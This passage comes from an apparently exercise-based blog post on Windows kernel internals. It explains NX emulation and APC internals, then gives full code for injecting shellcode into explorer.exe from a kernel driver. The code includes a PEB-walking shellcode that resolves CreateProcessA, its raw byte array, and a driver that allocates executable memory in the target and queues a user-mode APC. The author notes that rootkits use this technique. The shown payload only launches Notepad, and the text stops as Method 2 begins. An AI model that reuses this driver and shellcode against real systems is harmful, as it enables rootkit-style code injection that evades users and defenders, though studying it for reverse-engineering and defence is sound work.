leave out a range of addresses that are not part of it. Then a data segment can be created using this range of memory that is not part of the code segment. At this point, the code segment can be marked as executable, and the data segment can be marked as read/write only, ensuring that if the execution ends up in the range of addresses reserved for the data, an exception is raised.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Another potential way to emulate the NX bit would be to modify the page tables for the heap and stack in order to make them invalid: every access to a page would trigger a page fault, that would be trapped by the page fault handler. The OS would have to check the kind of fault, and determine if it is a memory read, write or execute. If it is execute, then there is something wrong and the process will be terminated. In theory, this would work, but in practice it would add a very big overhead on the run time (every memory access would cause an exception!), thus it may not be feasible (the PaX Linux kernel patch uses a similar approach).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>2) </b></span><br />
<span style="font-family: Verdana, sans-serif;">The APIs that provide the functionality to manage APCs are <i>KeInitializeApc</i> and <i>KeInsertQueueApc</i>. S</span><span style="font-family: Verdana, sans-serif;">ince they are not declared in the DDK headers it is necessary to </span><span style="font-family: Verdana, sans-serif;">assign their addresses to appropriate function pointers via <i>MmGetSystemRoutineAddress </i>in order to use them.</span><br />
<ul>
<li><i style="font-family: Verdana, sans-serif;">KeInitializeApc </i><span style="font-family: Verdana, sans-serif;">simply initializes a KAPC structure by storing into it all the necessary information about the APC that is going to be queued for execution, including the KTHREAD to which the APC must be queued to and the addresses of the </span><span style="font-family: Verdana, sans-serif;">callbacks</span><span style="font-family: Verdana, sans-serif;"> to run.</span></li>
<li><span style="font-family: Verdana, sans-serif;"><i>KeInsertQueueApc</i>, instead, does the actual work of scheduling the APC for execution in the given <i>KAPC.Thread</i> (of type KTHREAD). To do so, it begins by acquiring the spinlock stored in <i>KTHREAD.ApcQueueLock</i>, necessary for proper synchronization. Then, if<i> KTHREAD.ApcQueueable</i> is set to 1, the API invokes the internal function <i>KiInsertQueueApc</i>, which in turn </span><span style="font-family: Verdana, sans-serif;">verifies that </span><i style="font-family: Verdana, sans-serif;">KAPC.Inserted</i><b style="font-family: Verdana, sans-serif;"> </b><span style="font-family: Verdana, sans-serif;">is set to 0 and, if it is, adds</span><span style="font-family: Verdana, sans-serif;"> the APC to some memory referenced by the</span><span style="font-family: Verdana, sans-serif;"> <i>KTHREAD.ApcStatePointer </i>array<i>.</i> In particular, this array contains two pointers to <i>KAPC_STATE</i> structures, where the APC queues (implemented by using LIST_ENTRYs) are actually stored. </span><br><span style="font-family: Verdana, sans-serif;">Why two?</span><span style="font-family: Verdana, sans-serif;"> The first <i>KAPC_STATE </i>structure is related to the APCs whose <i>KAPC.ApcStateIndex</i> is <i>OriginalApcEnvrionment</i>, while the second is related to </span><span style="font-family: Verdana, sans-serif;">the ones whose <i>KAPC.ApcStateIndex</i> is</span><span style="font-family: Verdana, sans-serif;"> <i>AttachedApcEnvironment</i>. Basically, the value of </span><i style="font-family: Verdana, sans-serif;">KAPC.ApcStateIndex </i><span style="font-family: Verdana, sans-serif;">differentiates between the APCs that are running in the context of the process to which the thread belongs and the ones that are running in a thread that is attached to a different process. This is why two structures are kept. <br>Once the correct one is determined, a further discrimination is to be made</span><span style="font-family: Verdana, sans-serif;">. E</span><span style="font-family: Verdana, sans-serif;">ach structure contains an array of two LIST_ENTRY structures (named </span><span style="font-family: Verdana, sans-serif;"><i>KAPC_STATE.ApcListHead</i>)</span><span style="font-family: Verdana, sans-serif;">, that are selected </span><span style="font-family: Verdana, sans-serif;">according to the </span><span style="font-family: Verdana, sans-serif;">value stored in <i>KAPC.ApcMode</i>, which is either 0 (KernelMode) or 1 (UserMode)</span><span style="font-family: Verdana, sans-serif;">. </span><span style="font-family: Verdana, sans-serif;">These are the actual APCs queues.<br>Once the APC is queued, the member <i>KAPC.Inserted</i> is set to 1, and then, if the APC is kernelmode, <i>KTHREAD.KAPC_STATE.KernelApcPending</i> is also set to 1. Furthermore, <i>HalRequestSoftwareInterrupt</i> may be invoked to switch to APC_LEVEL.</span></li>
<li><span style="font-family: Verdana, sans-serif;">The queues of APCs will eventually be walked by the </span><i style="font-family: Verdana, sans-serif;">KiDeliverApc</i><span style="font-family: Verdana, sans-serif;"> API, which will call the various kernel, normal and rundown routines for each APC.</span></li>
</ul>
<span style="font-family: Verdana, sans-serif;">APCs offer the possibility to execute code inside a specific process' context and t</span><span style="font-family: Verdana, sans-serif;">here are various possible use cases for them. Windows uses APCs to perform thread suspension, to schedule some completion routines, to set and get a thread's context, and more.</span><br />
<span style="font-family: Verdana, sans-serif;">Usermode APCs provide a handy way to execute code in usermode from kernelmode, commonly done by rootkits since it allows the possibility to inject malicious payloads in running processes, hook their APIs etc. </span><span style="font-family: Verdana, sans-serif;">Examples are presented in the answer to exercise 3.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>3)</b></span><br />
<span style="font-family: Verdana, sans-serif;">Since there is no directly available API to create a process from kernel mode, I decided to </span><span style="font-family: Verdana, sans-serif;">leverage APCs to run malicious usermode code in a particular process</span><span style="font-family: Verdana, sans-serif;">. I devised three different ways to achieve this goal and, although all of them rely on APCs, their approach changes considerably.</span><br />
<span style="font-family: Verdana, sans-serif;">The general strategy involves some preliminary operations to locate the </span><span style="font-family: Verdana, sans-serif;">target process, obtain its handle and allocate some memory in its process address space. The malicious code is then copied in this memory area (injection) and an APC </span><span style="font-family: Verdana, sans-serif;">is initialized in either one of these ways:</span><br />
<ol>
<li><span style="font-family: Verdana, sans-serif;">Usermode APC with the normal routine set to the allocated area, that contains the malicious code.</span></li>
<li><span style="font-family: Verdana, sans-serif;">Kernelmode APC with the kernel routine set to hook a user-mode API. In this case, the allocated area contains the assembly code of the hook, that will be executed only once,</span><span style="font-family: Verdana, sans-serif;"> in the context of the target process.</span></li>
<li><span style="font-family: Verdana, sans-serif;">Kernelmode APC with the kernel routine set to overwrite an empty entry in the kernel-to-usermode callback table with the address of the allocated area, and let </span><span style="font-family: Verdana, sans-serif;"><i>KeUserModeCallback</i> call it. The allocated area contains the malicious code.</span></li>
</ol>
<div>
<span style="font-family: Verdana, sans-serif;">There are of course many other methods to start a process from kernelmode code. For example, a</span><span style="font-family: Verdana, sans-serif;"> possible variant of <i>the second method</i>, that doesn't involve APCs, would consist in using </span><i style="font-family: Verdana, sans-serif;">SetCreateProcessNotifyRoutine</i><span style="font-family: Verdana, sans-serif;"> in order to inject the malicious code in every process that is created and then hooking a common API to redirect its code towards the malicious code. However, here I chose to focus solely on the three above mentioned ideas.</span></div>
<br />
<span style="font-family: Verdana, sans-serif;">
<u><b>Method 1</b></u></span><br />
<ul>
</ul>
<span style="font-family: Verdana, sans-serif;">For the first method, I used the APCs in the most natural way: I queued a usermode APC to <i>Explorer</i> that simply runs a "shellcode", which in turn locates and calls the <i>CreateProcess</i> </span><span style="font-family: Verdana, sans-serif;">API to execute <i>Notepad</i>.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">First of all, I needed to have the usermode shellcode, thus I wrote the following usermode application:</span><br />
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <stdio.h>
#include <intrin.h>
#include <windows.h>
typedef BOOL (*PCREATEPROCESS)(LPCTSTR lpApplicationName, LPTSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment,
LPCTSTR lpCurrentDirectory, LPSTARTUPINFO lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation);
void main(void)
{
unsigned __int64 ptrPEB;
unsigned __int64 ptrPEB_LDR_DATA;
unsigned __int64 ptrInLoadOrderModuleList;
unsigned __int64 DllBase;
unsigned int *pNames, *pAddresses;
PCREATEPROCESS pCreateProcess;
wchar_t *DllPath;
char app_notepad[12];
STARTUPINFO si;
PROCESS_INFORMATION pi;
app_notepad[0] = 'n';
app_notepad[1] = 'o';
app_notepad[2] = 't';
app_notepad[3] = 'e';
app_notepad[4] = 'p';
app_notepad[5] = 'a';
app_notepad[6] = 'd';
app_notepad[7] = '.';
app_notepad[8] = 'e';
app_notepad[9] = 'x';
app_notepad[10] = 'e';
app_notepad[11] = 0;
//memset(&si, 0, sizeof(si));
for(int j = 0; j < sizeof(si); j++)
{
((char *)&si)[j] = 0;
}
si.cb = sizeof(si);
//memset(&pi, 0, sizeof(pi));
for(int j = 0; j < sizeof(pi); j++)
{
((char *)&pi)[j] = 0;
}
IMAGE_DOS_HEADER *pMZ;
IMAGE_NT_HEADERS *pPE;
IMAGE_EXPORT_DIRECTORY *pExpDir;
CHAR *currentName;
ptrPEB = __readgsqword(0x60);
ptrPEB_LDR_DATA = *(unsigned __int64 *)(ptrPEB + 0x18);
ptrInLoadOrderModuleList = *((unsigned __int64 *)(ptrPEB_LDR_DATA + 0x10));
DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);
DllPath += 0x14; // skip "C:\windows\system32\"
while(true)
{
// 6b 00 65 00 72 00 6e 00 - 65 00 6c 00 33 00 32 00 - 2e 00 64 00 6c 00 6c 00
if( ((unsigned __int64 *)DllPath)[0] == 0x006e00720065006b &&
((unsigned __int64 *)DllPath)[1] == 0x00320033006c0065 &&
((unsigned __int64 *)DllPath)[2] == 0x006c006c0064002e )
{
break;
}
ptrInLoadOrderModuleList = *((unsigned __int64 *)ptrInLoadOrderModuleList);
DllPath = (wchar_t*) *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x50);
DllPath += 0x14; // skip "C:\windows\system32\"
}
DllBase = *(unsigned __int64 *)(ptrInLoadOrderModuleList + 0x30);
pMZ = (IMAGE_DOS_HEADER*)DllBase;
pPE = (IMAGE_NT_HEADERS*)(DllBase + pMZ->e_lfanew);
pExpDir = (IMAGE_EXPORT_DIRECTORY*)(DllBase + pPE->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
pNames = (unsigned int *)(DllBase + pExpDir->AddressOfNames);
pAddresses = (unsigned int *)(DllBase + pExpDir->AddressOfFunctions);
for(unsigned int i = 0; i < pExpDir->NumberOfNames; i++)
{
currentName = (CHAR*)(DllBase + pNames[i]);
//43 72 - 65 61 - 74 65 - 50 72 - 6f 63 - 65 73 - 73 41
if( ((unsigned __int64 *) currentName)[0] == 0x7250657461657243 &&
((unsigned __int32 *) currentName)[2] == 0x7365636f &&
((unsigned short *) currentName)[6] == 0x4173 )
{
pCreateProcess = (PCREATEPROCESS)(DllBase + pAddresses[i]);
break;
}
}
pCreateProcess(NULL, (LPTSTR)app_notepad, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
}
</code></pre>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This code purposely avoids the use of any API or CRT function in order to be relocatable. As a result, after compiling it, I was able </span><span style="font-family: Verdana, sans-serif;">to simply copy all the opcodes generated for the "main" function and use them as an executable buffer that gets injected into a running process.</span><br />
<span style="font-family: Verdana, sans-serif;">The shellcode behaves similarly to the ones you can find in the exploits: it accesses the PEB to get the <i>PEB_LDR_DATA</i> and its <i>InLoadOrderModuleList</i> field, which is a </span><span style="font-family: Verdana, sans-serif;">pointer to a list of <i>LDR_DATA_TABLE_ENTRY</i> structures, each representing a loaded module. The code walks the list to locate <i>kernel32.dll</i> (the DLL name is </span><span style="font-family: Verdana, sans-serif;">kept in LDR_DATA_TABLE_ENTRY.FullDllName) and, once found, it retrieves its imagebase via LDR_DATA_TABLE_ENTRY.DllBase. It is then straightforward to parse </span><span style="font-family: Verdana, sans-serif;">the PE header of the dll in order to locate its export table, and the address of the <i>CreateProcessA</i> API from it. The shellcode concludes by calling such API to launch </span><span style="font-family: Verdana, sans-serif;">Notepad.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Having the shellcode sorted out, let's see the code for the kernelmode driver (</span><span style="font-family: Verdana, sans-serif;">note that the shellcode is encoded in the "buffer[]" array)</span><span style="font-family: Verdana, sans-serif;">:</span></div>
<style type="text/css">
pre.CICodeFormatter{
font-family:arial;
font-size:12px;
border:1px dashed #CCCCCC;
width:99%;
height:auto;
overflow:auto;
background:#f0f0f0;
line-height:20px;
background-image:URL(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi0RLiAlfLucI_qoHJvHaLwvgXby8Z5TK-aqUneDA06kscMW-ILm4a94iJq4qsFWJQEUtkkWWtnA6woWdwoPT2LE4DB2URdsSOOa3-smdrFFQB1oG2jam0NLQaJYk7Z95MyTJNdoHSDytEn/s320/codebg.gif);
padding:0px;
color:#000000;
text-align:left;
}
pre.CICodeFormatter code{
color:#000000;
word-wrap:normal;
}
</style>
<pre class="CICodeFormatter"><code class="CICodeFormatter"> #include <Ntifs.h>
#include <string.h>
char buffer[] = {
0x48, 0x81, 0xEC, 0x68, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x24, 0x38, 0x01, 0x00, 0x00, 0x6E, 0xC6,
0x84, 0x24, 0x39, 0x01, 0x00, 0x00, 0x6F, 0xC6, 0x84, 0x24, 0x3A, 0x01, 0x00, 0x00, 0x74, 0xC6,
0x84, 0x24, 0x3B, 0x01, 0x00, 0x00, 0x65, 0xC6, 0x84, 0x24, 0x3C, 0x01, 0x00, 0x00, 0x70, 0xC6,
0x84, 0x24, 0x3D, 0x01, 0x00, 0x00, 0x61, 0xC6, 0x84, 0x24, 0x3E, 0x01, 0x00, 0x00, 0x64, 0xC6,
0x84, 0x24, 0x3F, 0x01, 0x00, 0x00, 0x2E, 0xC6, 0x84, 0x24, 0x40, 0x01, 0x00, 0x00, 0x65, 0xC6,
0x84, 0x24, 0x41, 0x01, 0x00, 0x00, 0x78, 0xC6, 0x84, 0x24, 0x42, 0x01, 0x00, 0x00, 0x65, 0xC6,
0x84, 0x24, 0x43, 0x01, 0x00, 0x00, 0x00, 0xC7, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,
0x50, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x68,
0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x50, 0x01, 0x00, 0x00, 0xC6, 0x84, 0x04, 0xC0, 0x00, 0x00,
0x00, 0x00, 0xEB, 0xD0, 0xC7, 0x84, 0x24, 0xC0, 0x00, 0x00, 0x00, 0x68, 0x00, 0x00, 0x00, 0xC7,
0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x54,
0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24, 0x54, 0x01, 0x00, 0x00, 0x48, 0x63, 0x84, 0x24,
0x54, 0x01, 0x00, 0x00, 0x48, 0x83, 0xF8, 0x18, 0x73, 0x12, 0x48, 0x63, 0x84, 0x24, 0x54, 0x01,
0x00, 0x00, 0xC6, 0x84, 0x04, 0x80, 0x00, 0x00, 0x00, 0x00, 0xEB, 0xD0, 0x65, 0x48, 0x8B, 0x04,
0x25, 0x60, 0x00, 0x00, 0x00, 0x48, 0x89, 0x84, 0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x84,
0x24, 0x30, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x18, 0x48, 0x89, 0x84, 0x24, 0x48, 0x01, 0x00,
0x00, 0x48, 0x8B, 0x84, 0x24, 0x48, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x10, 0x48, 0x89, 0x84,
0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40,
0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48,
0x89, 0x44, 0x24, 0x50, 0x33, 0xC0, 0x83, 0xF8, 0x01, 0x74, 0x74, 0x48, 0x8B, 0x44, 0x24, 0x50,
0x48, 0xB9, 0x6B, 0x00, 0x65, 0x00, 0x72, 0x00, 0x6E, 0x00, 0x48, 0x39, 0x08, 0x75, 0x2C, 0x48,
0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x65, 0x00, 0x6C, 0x00, 0x33, 0x00, 0x32, 0x00, 0x48, 0x39,
0x48, 0x08, 0x75, 0x17, 0x48, 0x8B, 0x44, 0x24, 0x50, 0x48, 0xB9, 0x2E, 0x00, 0x64, 0x00, 0x6C,
0x00, 0x6C, 0x00, 0x48, 0x39, 0x48, 0x10, 0x75, 0x02, 0xEB, 0x34, 0x48, 0x8B, 0x84, 0x24, 0x98,
0x00, 0x00, 0x00, 0x48, 0x8B, 0x00, 0x48, 0x89, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B,
0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x50, 0x48, 0x89, 0x44, 0x24, 0x50, 0x48,
0x8B, 0x44, 0x24, 0x50, 0x48, 0x83, 0xC0, 0x28, 0x48, 0x89, 0x44, 0x24, 0x50, 0xEB, 0x85, 0x48,
0x8B, 0x84, 0x24, 0x98, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x40, 0x30, 0x48, 0x89, 0x44, 0x24, 0x68,
0x48, 0x8B, 0x44, 0x24, 0x68, 0x48, 0x89, 0x84, 0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x84,
0x24, 0xA8, 0x00, 0x00, 0x00, 0x48, 0x63, 0x40, 0x3C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03,
0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x78, 0x48, 0x8B, 0x44, 0x24, 0x78, 0x8B, 0x80,
0x88, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48,
0x89, 0x44, 0x24, 0x70, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x20, 0x48, 0x8B, 0x4C, 0x24,
0x68, 0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x48,
0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x1C, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8, 0x48,
0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x60, 0xC7, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0xEB, 0x10, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00, 0xFF, 0xC0, 0x89, 0x84, 0x24,
0x58, 0x01, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x70, 0x8B, 0x40, 0x18, 0x39, 0x84, 0x24, 0x58,
0x01, 0x00, 0x00, 0x0F, 0x83, 0x86, 0x00, 0x00, 0x00, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,
0x48, 0x8B, 0x8C, 0x24, 0xA0, 0x00, 0x00, 0x00, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68,
0x48, 0x03, 0xC8, 0x48, 0x8B, 0xC1, 0x48, 0x89, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0x8B,
0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x48, 0xB9, 0x43, 0x72, 0x65, 0x61, 0x74, 0x65, 0x50, 0x72,
0x48, 0x39, 0x08, 0x75, 0x45, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x81, 0x78, 0x08,
0x6F, 0x63, 0x65, 0x73, 0x75, 0x34, 0x48, 0x8B, 0x84, 0x24, 0xB0, 0x00, 0x00, 0x00, 0x0F, 0xB7,
0x40, 0x0C, 0x3D, 0x73, 0x41, 0x00, 0x00, 0x75, 0x21, 0x8B, 0x84, 0x24, 0x58, 0x01, 0x00, 0x00,
0x48, 0x8B, 0x4C, 0x24, 0x60, 0x8B, 0x04, 0x81, 0x48, 0x8B, 0x4C, 0x24, 0x68, 0x48, 0x03, 0xC8,
0x48, 0x8B, 0xC1, 0x48, 0x89, 0x44, 0x24, 0x58, 0xEB, 0x05, 0xE9, 0x55, 0xFF, 0xFF, 0xFF, 0x48,
0x8D, 0x84, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x48, 0x48, 0x8D, 0x84, 0x24,
0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0x44, 0x24, 0x40, 0x48, 0xC7, 0x44, 0x24, 0x38, 0x00, 0x00,
0x00, 0x00, 0x48, 0xC7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x28, 0x00,
0x00, 0x00, 0x00, 0xC7, 0x44, 0x24, 0x20, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xC9, 0x45, 0x33,
0xC0, 0x48, 0x8D, 0x94, 0x24, 0x38, 0x01, 0x00, 0x00, 0x33, 0xC9, 0xFF, 0x54, 0x24, 0x58, 0x33,
0xC0, 0x48, 0x81, 0xC4, 0x68, 0x01, 0x00, 0x00, 0xC3
};
typedef enum _KAPC_ENVIRONMENT
{
OriginalApcEnvironment,
AttachedApcEnvironment,
CurrentApcEnvironment,
InsertApcEnvironment
} KAPC_ENVIRONMENT, *PKAPC_ENVIRONMENT;
VOID KernelRoutine(struct _KAPC *Apc,
PKNORMAL_ROUTINE *NormalRoutine,
PVOID *NormalContext,
PVOID *SystemArgument1,
PVOID *SystemArgument2 )
{
DbgPrint("APC kernel routine\n");
ExFreePool(Apc);
}
VOID MyUnload(PDRIVER_OBJECT DriverObject)
{
DbgPrint("Unload routine\n");
}
NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
PEPROCESS p_proc;
LIST_ENTRY *lentry;
LIST_ENTRY *le;
char * pImgFNam;
HANDLE pid;
BOOLEAN check = FALSE;
HANDLE ProcHandle = 0;
OBJECT_ATTRIBUTES ObjAttr;
SIZE_T region_size = 4096;
ULONG zero_bits = 0;
UNICODE_STRING apiName;
UCHAR *baseaddr = 0;
ULONG bw;
NTSTATUS status_code;
CLIENT_ID client_id;
PETHREAD ethreads;
KAPC_STATE apc_state;
VOID (*PKeInitializeApc) (PRKAPC Apc, PKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine OPTIONAL, PKNORMAL_ROUTINE NormalRoutine OPTIONAL, KPROCESSOR_MODE ApcMode, PVOID NormalContext);
BOOLEAN (*PKeInsertQueueApc) (PKAPC Apc, PVOID SystemArgument1, PVOID SystemArgument2, UCHAR mode);
struct _KAPC *pApc;
DriverObject->DriverUnload = &MyUnload;
p_proc = PsGetCurrentProcess();
lentry = (LIST_ENTRY *) ( ((unsigned char*)p_proc) + 0x188 ); // ActiveProcessLinks : _LIST_ENTRY
for(le = lentry; le->Flink != lentry; le = le->Flink)
{
p_proc = (PEPROCESS) ( ((unsigned char*)le) - 0x188 );
pImgFNam = (char *)( ((unsigned char*) p_proc) + 0x2e0 );
if(strncmp(pImgFNam, "explorer.exe", sizeof("explorer.exe")) == 0)
{
check = TRUE;
break;
}
}
if(!check)
{
return STATUS_UNSUCCESSFUL;
}
pid = PsGetProcessId(p_proc);
le = (LIST_ENTRY*) ( ((unsigned char *)p_proc) + 0x30); // ThreadListHead
ethreads = (PETHREAD) ( ((unsigned char*)(le->Flink)) - 0x2f8);
client_id.UniqueProcess = pid;
client_id.UniqueThread = PsGetThreadId(ethreads);
ObjAttr.Length = sizeof (OBJECT_ATTRIBUTES);
ObjAttr.RootDirectory = NULL;
ObjAttr.Attributes = OBJ_KERNEL_HANDLE;
ObjAttr.ObjectName = NULL;
ObjAttr.SecurityDescriptor = NULL;
ObjAttr.SecurityQualityOfService = NULL;
status_code = ZwOpenProcess(&ProcHandle, GENERIC_ALL, &ObjAttr, &client_id);
if(status_code != STATUS_SUCCESS)
{
return STATUS_UNSUCCESSFUL;
}
status_code = ZwAllocateVirtualMemory(ProcHandle, &baseaddr, (ULONG_PTR)&zero_bits, &region_size, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if(status_code != STATUS_SUCCESS)
{
ZwClose(ProcHandle);
return STATUS_UNSUCCESSFUL;
}
KeStackAttachProcess(p_proc, &apc_state);
memcpy(baseaddr, buffer, sizeof(buffer));
KeUnstackDetachProcess(&apc_state);
RtlInitUnicodeString(&apiName, L"KeInitializeApc");
PKeInitializeApc = MmGetSystemRoutineAddress(&apiName);
RtlInitUnicodeString(&apiName, L"KeInsertQueueApc");
PKeInsertQueueApc = MmGetSystemRoutineAddress(&apiName);
pApc = ExAllocatePool(NonPagedPool, sizeof(struct _KAPC));
PKeInitializeApc(pApc, ethreads, OriginalApcEnvironment, &KernelRoutine, NULL, (PKNORMAL_ROUTINE)baseaddr, UserMode, NULL);
if(!PKeInsertQueueApc(pApc, 0, 0, 0))
{
return STATUS_UNSUCCESSFUL;
}
ZwClose(ProcHandle);
return STATUS_SUCCESS;
}
</code></pre>
<div style="text-align: left;">
<div style="text-align: justify;">
<br />
<span style="font-family: Verdana, sans-serif;">The driver begins by walking the </span><i style="font-family: Verdana, sans-serif;">ActiveProcessLinks</i><span style="font-family: Verdana, sans-serif;"> from the EPROCESS</span><span style="font-family: Verdana, sans-serif;"> structure in order to locate the EPROCESS corresponding to <i>Explorer.exe </i>(the target process)</span><span style="font-family: Verdana, sans-serif;">. The code then retrieves the </span><i style="font-family: Verdana, sans-serif;">ThreadListHead</i><span style="font-family: Verdana, sans-serif;"> from </span><span style="font-family: Verdana, sans-serif;">this EPROCESS, and takes note of the first ETHREAD of the list (it is not really important which one). Having done that, </span><i style="font-family: Verdana, sans-serif;">PsGetProcessId</i><span style="font-family: Verdana, sans-serif;"> and</span><i style="font-family: Verdana, sans-serif;"> PsGetThreadId</i><span style="font-family: Verdana, sans-serif;"> are called to retrieve the CID of the target process/thread. </span><span style="font-family: Verdana, sans-serif;">The driver proceeds by allocating an executable area of memory inside the process via </span><i style="font-family: Verdana, sans-serif;">ZwOpenProcess/ZwAllocateVirtualMemory</i><span style="font-family: Verdana, sans-serif;">, where it then </span><span style="font-family: Verdana, sans-serif;">copies the shellcode bytes. To perform the copy, the driver needs to switch to the <i>Explorer</i> process context via <i>KeStackAttachProcess/</i></span><i style="font-family: Verdana, sans-serif;">KeUnstackDetachProcess</i><span style="font-family: Verdana, sans-serif;">.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Finally, an APC is initialized by calling <i>KeInitializeApc</i> and passing to it the pointer to</span><span style="font-family: Verdana, sans-serif;"> the allocated shellcode as the normal routine. This Apc is finally queued to the target thread belonging to <i>Explorer</i> via <i>KeInsertQueueApc</i>. To be precise, during the initialization, a</span><span style="font-family: Verdana, sans-serif;"> kernel routine is required by the OS as well, but since we don't really need it, I specified a dummy one that simply deinitializes the reserved memory for the KAPC structure.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">At this point, whenever the target thread is scheduled for execution, the APC is going to be run and the usermode shellcode will start a new process. It goes without saying that it is important to choose </span><span style="font-family: Verdana, sans-serif;">a thread that is actually<b> </b>in an <i>alertable state</i>: some processes may have threads that are asleep or stuck in a wait, and if an APC is queued to them, it may never have a chance to </span><span style="font-family: Verdana, sans-serif;">be executed. In my case I picked the first thread of the E</span><span style="font-family: Verdana, sans-serif;"><i>xplorer</i> process for a commodity: I noticed that this thread awakens when you right click on the icon of a </span><span style="font-family: Verdana, sans-serif;">folder on the desktop, thus it is very handy because it allowed<b> </b>me to trigger the APC manually whenever I want.</span><br />
<br /></div>
<span style="font-family: Verdana, sans-serif;"><b><u>Method 2</u></b></span><br />
<ul>
</ul>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an alternative, I decided to hijack the</span><span style="font-family: Verdana, sans-serif;"> execution flow of a process towards my shellcode harnessing kernelmode APCs. The idea is to patch an API that gets called quite </span><span style="font-family: Verdana, sans-serif;">often: the patch installs a jump to the shellcode </span><span style="font-family: Verdana, sans-serif;">in the entry point of the API, which</span><span style="font-family: Verdana, sans-serif;">, in turn, executes Notepad and calls the original API.</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
